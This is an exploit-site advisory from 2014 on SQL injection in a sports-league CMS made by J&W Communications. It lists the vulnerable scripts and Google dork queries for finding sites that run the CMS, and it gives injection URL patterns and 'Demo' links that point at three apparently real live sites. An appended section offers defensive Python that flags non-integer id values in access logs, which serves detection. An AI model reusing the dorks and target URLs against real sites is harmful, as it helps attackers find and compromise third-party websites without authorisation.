
J&W Communications SQL Injection

Posted on 30 July 2014

[+] Title: J&W Communications Cms SQL Injection Vulnerability
[+] Date: 2014-07-29
[+] Author: Hekt0r
[+] Vendor Homepage: www.jw-com.com
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files:
/rosters.php
/team.php
/scoresheet.php
[+] Dork :
intext:"designed by J&W Communications"
inurl:/team.php.php?id=
inurl:/rosters.php?id=
inurl:/scoresheet.php?sched_id=

### POC:
http://site/team.php.php?id=[SQL-Injection]
http://site/rosters.php?id=[SQL-Injection]
http://site/scoresheet.php?sched_id=[SQL-Injection]

### Demo:
http://www.ambhl.ab.ca/team.php?id=132%27
http://edmbantamtourney.com/rosters.php?id=19%27
http://www.pwnhl.ca/scoresheet.php?sched_id=44%27

### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady, Saeed.Jok3r M4hdi, Black Hacker, Vahid Hαcĸer, BlackErroR, Phantom.S3c And All members of Iran Security Group
[+] iransec.net
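For operators of an affected site, the following added example (not part of the original advisory and not vendor code) scans web access logs for requests to the three listed scripts whose `id` / `sched_id` value is not a plain integer. It assumes combined-format access logs and that legitimate values are short decimal record IDs; the function names and sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Script name -> parameter, as listed in the advisory.
WATCHED = {"team.php": "id", "rosters.php": "id", "scoresheet.php": "sched_id"}

# Client address and request target from a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: legitimate values are short decimal record IDs.
INTEGER_RE = re.compile(r"[0-9]{1,10}")


def suspicious_requests(lines):
    """Return (client, script, param, decoded_value) for every request to a
    watched script whose parameter is not a plain decimal integer."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        script = posixpath.basename(url.path)  # CMS may live in a subdirectory
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qsl percent-decodes once, so %27 arrives here as a quote.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param and not INTEGER_RE.fullmatch(value):
                hits.append((client, script, param, value))
    return hits


# Constructed sample log lines using documentation address ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jul/2014:10:00:01 +0000] "GET /team.php?id=132 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jul/2014:10:00:05 +0000] "GET /team.php?id=132%27 HTTP/1.1" 200 312',
    '192.0.2.10 - - [30/Jul/2014:10:00:09 +0000] "GET /league/rosters.php?id=19 HTTP/1.1" 200 4096',
    '203.0.113.5 - - [30/Jul/2014:10:00:12 +0000] "GET /scoresheet.php?sched_id=44%2527 HTTP/1.1" 200 298',
    '203.0.113.5 - - [30/Jul/2014:10:00:15 +0000] "GET /index.php?id=abc HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the scripts themselves: reject or cast the parameter before it reaches the query, and bind it through a prepared statement.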

 
